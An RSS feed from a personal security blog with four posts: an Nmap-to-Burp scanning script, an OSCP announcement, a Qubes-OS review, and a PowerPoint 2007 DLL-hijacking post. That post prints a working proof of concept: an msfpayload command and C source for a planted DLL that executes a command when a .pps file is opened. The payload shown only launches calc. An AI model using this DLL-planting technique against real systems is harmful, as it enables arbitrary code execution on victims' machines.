<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>Monstream00&#039;s</title>
	<atom:link href="http://monstream00.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://monstream00.wordpress.com</link>
	<description>Information Security Blog</description>
	<lastBuildDate>Fri, 06 Jan 2012 23:48:20 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='monstream00.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>Monstream00&#039;s</title>
		<link>http://monstream00.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://monstream00.wordpress.com/osd.xml" title="Monstream00&#039;s" />
	<atom:link rel='hub' href='http://monstream00.wordpress.com/?pushpress=hub'/>
		<item>
		<title>Import Nmap to Burp</title>
		<link>http://monstream00.wordpress.com/2012/01/06/import-nmap-to-burp/</link>
		<comments>http://monstream00.wordpress.com/2012/01/06/import-nmap-to-burp/#comments</comments>
		<pubDate>Fri, 06 Jan 2012 23:48:19 +0000</pubDate>
		<dc:creator>monstream00</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://monstream00.wordpress.com/?p=60</guid>
		<description><![CDATA[It has been a while, but that is what happens when you have a new born and are working on your Masters Degree. I have just released a buby script that will combine the power of nmap into burp. http://bazaar.launchpad.net/~miked1981/monstream00/monStream00/files/head:/bubyscripts/ How to run: ./runnmapburp.sh Would you like to use Nmap/Burp? 1: No 2: Yes 2 [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=monstream00.wordpress.com&amp;blog=13394348&amp;post=60&amp;subd=monstream00&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>It has been a while, but that is what happens when you have a new born and are working on your Masters Degree. I have just released a buby script that will combine the power of nmap into burp.</p>
<p>http://bazaar.launchpad.net/~miked1981/monstream00/monStream00/files/head:/bubyscripts/</p>
<p>How to run:<br />
./runnmapburp.sh<br />
Would you like to use Nmap/Burp?<br />
1: No<br />
2: Yes<br />
2<br />
What is the network range?<br />
10.0.0.1/24<br />
running nmap on scope&#8230;&#8230;.<br />
Loading: “attack_test.rb”</p>
<p>This will do a Nmap scan then spider the results of that scan while adding them to scope.</p>
<p>Have fun!!!!!!!!!!!</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/monstream00.wordpress.com/60/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/monstream00.wordpress.com/60/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/monstream00.wordpress.com/60/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/monstream00.wordpress.com/60/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/monstream00.wordpress.com/60/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/monstream00.wordpress.com/60/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/monstream00.wordpress.com/60/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/monstream00.wordpress.com/60/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/monstream00.wordpress.com/60/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/monstream00.wordpress.com/60/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/monstream00.wordpress.com/60/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/monstream00.wordpress.com/60/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/monstream00.wordpress.com/60/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/monstream00.wordpress.com/60/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=monstream00.wordpress.com&amp;blog=13394348&amp;post=60&amp;subd=monstream00&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://monstream00.wordpress.com/2012/01/06/import-nmap-to-burp/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/bbd7d2ca9f5049ed6de74ac4423e9ede?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">monstream00</media:title>
		</media:content>
	</item>
		<item>
		<title>Microsoft Windows Power Point 2007 DLL Hijacking Exploit (pp4x322.dll)</title>
		<link>http://monstream00.wordpress.com/2010/08/25/microsoft-windows-power-point-2007-dll-hijacking-exploit-pp4x322-dll/</link>
		<comments>http://monstream00.wordpress.com/2010/08/25/microsoft-windows-power-point-2007-dll-hijacking-exploit-pp4x322-dll/#comments</comments>
		<pubDate>Thu, 26 Aug 2010 00:24:12 +0000</pubDate>
		<dc:creator>monstream00</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://monstream00.wordpress.com/?p=35</guid>
		<description><![CDATA[Today is a crazy day with everyone and there mother searching for DLL Hijacking Exploits. They are going quick so get in before they are all gone. Bellow is a exploit I found for .pps files in MS Power Point 2007. Power Point looks for pp4x322.dll and loads it. This will not work with real [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=monstream00.wordpress.com&amp;blog=13394348&amp;post=35&amp;subd=monstream00&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Today is a crazy day with everyone and there mother searching for DLL Hijacking Exploits. They are going quick so get in before they are all gone. <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  Bellow is a exploit I found for .pps files in MS Power Point 2007. Power Point looks for pp4x322.dll and loads it. This will not work with real .pps but will work with a text file if extension is changed to a .pps instead of .txt. I have tested it on Windows 7 64bit and it works. Rapid 7 has a great article on DLL Hijacking and it is a must read.</p>
<p><a href="http://blog.metasploit.com/2010/08/exploiting-dll-hijacking-flaws.html">http://blog.metasploit.com/2010/08/exploiting-dll-hijacking-flaws.htm</a>l</p>
<pre><strong>msfpayload windows/exec CMD=calc.exe D &gt; pp4x322.dll
or</strong>
<strong>/*</strong>

<strong>Exploit Title: Microsoft Windows Power Point 2007 DLL Hijacking Exploit (pp4x322.dll)
Date: August 25, 2010
Author: monstream00 (monstream00 [at} hotmail.com)
Modified storm's exploit for pp4x322.dll and used Rapid7 write up to find. Happy hunting.
Rapid7 write up: http://blog.metasploit.com/2010/08/exploiting-dll-hijacking-flaws.html
Tested on: Windows 7 64bit, XP SP3 with MS Office PowerPoint 2007 SP2 MSO 12.0.6535.5002</strong>

<strong>http://monstream00.wordpress.com/</strong>

<strong>gcc -shared -o pp4x322.dll powerpoint2007-DLL.c</strong>
<div id="_mcePaste"><strong>
</strong></div>

<strong>.pps file affected.</strong>

<strong>*/</strong>

<strong>#include windows.h</strong>

<strong>int hax()
{
WinExec("calc", 0);
exit(0);
return 0;
}</strong>

<strong>BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
hax();
return 0;
}</strong></pre>
<p>Also see corelan for a unofficial list of DLL Hijacking Exploits.<br />
<a href="http://www.corelan.be:8800/index.php/2010/08/25/dll-hijacking-kb-2269637-the-unofficial-list/">http://www.corelan.be:8800/index.php/2010/08/25/dll-hijacking-kb-2269637-the-unofficial-list/</a></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/monstream00.wordpress.com/35/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/monstream00.wordpress.com/35/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/monstream00.wordpress.com/35/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/monstream00.wordpress.com/35/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/monstream00.wordpress.com/35/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/monstream00.wordpress.com/35/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/monstream00.wordpress.com/35/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/monstream00.wordpress.com/35/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/monstream00.wordpress.com/35/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/monstream00.wordpress.com/35/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/monstream00.wordpress.com/35/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/monstream00.wordpress.com/35/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/monstream00.wordpress.com/35/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/monstream00.wordpress.com/35/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=monstream00.wordpress.com&amp;blog=13394348&amp;post=35&amp;subd=monstream00&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://monstream00.wordpress.com/2010/08/25/microsoft-windows-power-point-2007-dll-hijacking-exploit-pp4x322-dll/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/bbd7d2ca9f5049ed6de74ac4423e9ede?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">monstream00</media:title>
		</media:content>
	</item>
		<item>
		<title>Offensive Security Certified Professional (OSCP) certification here I come!</title>
		<link>http://monstream00.wordpress.com/2010/06/15/offensive-security-certified-professional-oscp-certification-here-i-come/</link>
		<comments>http://monstream00.wordpress.com/2010/06/15/offensive-security-certified-professional-oscp-certification-here-i-come/#comments</comments>
		<pubDate>Wed, 16 Jun 2010 03:38:14 +0000</pubDate>
		<dc:creator>monstream00</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://monstream00.wordpress.com/?p=28</guid>
		<description><![CDATA[Today I scheduled to take the Online Offensive Security PWB class so I can test my skills and hold an Offensive Security Certified Professional (OSCP) certification. I looked at Certified Ethical Hacker exam. Then I realized that a paper exam does not mean I would necessarily have the proof of the skills required to get [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=monstream00.wordpress.com&amp;blog=13394348&amp;post=28&amp;subd=monstream00&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Today I scheduled to take the Online Offensive Security PWB class so I can test my skills and hold an Offensive Security Certified Professional (OSCP) certification. I looked at Certified Ethical Hacker exam. Then I realized that a paper exam does not mean I would necessarily have the proof of the skills required to get in. That is where the OSCP lab comes in. It is a 24 hour lab and your certification is based on how much own-age you get. Sounds fun!!! Bellow is some information from there site with a link.</p>
<p>OSCP Certification</p>
<p>The Offensive Security Certified Professional (OSCP) is a unique and industry leading IT Security Certification that tests real world skills in the penetration testing field. No multiple choice questions, no theoretical fluff – The student will be expected to dive into an unknown network, craft custom tailored exploits, find security flaws, and exploit weaknesses within the architecture in order to pass the certification process. Students who successfully complete the Offensive Security PWB Penetration Testing Training certification challenge receive the OSCP certification. Penetration Testing with BackTrack simulates a full penetration test from start to finish by injecting the student into a rich, diverse and vulnerable network environment. Pre-Requisites</p>
<p>Pentesting with BackTrack is an entry-level course but still requires students to have certain knowledge prior to attending the class. A solid understanding of TCP/IP, networking, and reasonable Linux skills are required. This course is not for the faint of heart, it requires practice, testing, and the ability to want to learn in a manner that will grow your career in the information security field and defeat learning plateau’s. Offensive Security challenges you to rise above the rest, dive into the fine arts of advanced penetration testing, and “Try Harder”.</p>
<p>http://www.offensive-security.com/online-information-security-training/penetration-testing-backtrack/</p>
<p>I passed my OSCP exam!</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/monstream00.wordpress.com/28/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/monstream00.wordpress.com/28/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/monstream00.wordpress.com/28/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/monstream00.wordpress.com/28/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/monstream00.wordpress.com/28/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/monstream00.wordpress.com/28/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/monstream00.wordpress.com/28/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/monstream00.wordpress.com/28/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/monstream00.wordpress.com/28/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/monstream00.wordpress.com/28/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/monstream00.wordpress.com/28/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/monstream00.wordpress.com/28/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/monstream00.wordpress.com/28/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/monstream00.wordpress.com/28/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=monstream00.wordpress.com&amp;blog=13394348&amp;post=28&amp;subd=monstream00&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://monstream00.wordpress.com/2010/06/15/offensive-security-certified-professional-oscp-certification-here-i-come/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/bbd7d2ca9f5049ed6de74ac4423e9ede?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">monstream00</media:title>
		</media:content>
	</item>
		<item>
		<title>Qubes-OS</title>
		<link>http://monstream00.wordpress.com/2010/04/29/qubes-os/</link>
		<comments>http://monstream00.wordpress.com/2010/04/29/qubes-os/#comments</comments>
		<pubDate>Thu, 29 Apr 2010 17:44:19 +0000</pubDate>
		<dc:creator>monstream00</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://monstream00.wordpress.com/?p=1</guid>
		<description><![CDATA[Qubes-OS alpha was released recently. I installed Qubes-OS on a test computer and the installation directions were easy to understand and follow. I really like the Qubes-OS design because it separates your computer into multiple security domains. Also Invisible Things Lab has a great write up on the Qubes-OS architecture. It is well worth the [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=monstream00.wordpress.com&amp;blog=13394348&amp;post=1&amp;subd=monstream00&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Qubes-OS alpha was released recently. I installed Qubes-OS on a test computer and the installation directions were easy to understand and follow. I really like the Qubes-OS design because it separates your computer into multiple security domains. Also <a title="http://invisiblethingslab.com/itl/Welcome.html" href="http://invisiblethingslab.com/itl/Welcome.html">Invisible Things   Lab</a> has a great write up on the <a href="http://qubes-os.org/files/doc/arch-spec-0.3.pdf">Qubes-OS architecture</a>. It is well worth the read. I am looking forward to the full release of Qubes-OS!</p>
<p><em>&#8220;Qubes is an open source operating system  designed to provide strong security for desktop computing. Qubes is based on  Xen, X Window System, and Linux, and can run most Linux applications  and utilize most of the Linux drivers. In the future it might also run  Windows apps.</em></p>
<div id="id2">
<div>
<div>
<p><em>Qubes implements Security by Isolation approach. To do this,  Qubes utilizes virtualization technology, to be able to isolate various  programs from each other, and even sandbox many system-level components,  like networking or storage subsystem, so that their compromise don’t  affect the integrity of the rest of the system.</em></p>
</div>
</div>
</div>
<div id="id3">
<div>
<div>
<p><em>Qubes lets the  user define many security domains implemented as  lightweight Virtual Machines (VMs), or “AppVMs”.  E.g. user can have “personal”, “work”, “shopping”, “bank”, and “random”  AppVMs and can use the applications from within those VMs just like if  they were executing on the local machine, but at the same time they are  well isolated from each other. Qubes supports secure copy-and-paste and  file sharing between the AppVMs, of course.&#8221;</em> -http://qubes-os.org</p>
<p>Qubes-OS is supported by <a title="http://invisiblethingslab.com/itl/Welcome.html" href="http://invisiblethingslab.com/itl/Welcome.html">Invisible Things  Lab</a> and designed by Joanna Rutkowska and Rafal Wojtczuk.</p>
</div>
</div>
</div>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/monstream00.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/monstream00.wordpress.com/1/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/monstream00.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/monstream00.wordpress.com/1/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/monstream00.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/monstream00.wordpress.com/1/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/monstream00.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/monstream00.wordpress.com/1/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/monstream00.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/monstream00.wordpress.com/1/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/monstream00.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/monstream00.wordpress.com/1/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/monstream00.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/monstream00.wordpress.com/1/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=monstream00.wordpress.com&amp;blog=13394348&amp;post=1&amp;subd=monstream00&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://monstream00.wordpress.com/2010/04/29/qubes-os/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/bbd7d2ca9f5049ed6de74ac4423e9ede?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">monstream00</media:title>
		</media:content>
	</item>
	</channel>
</rss>
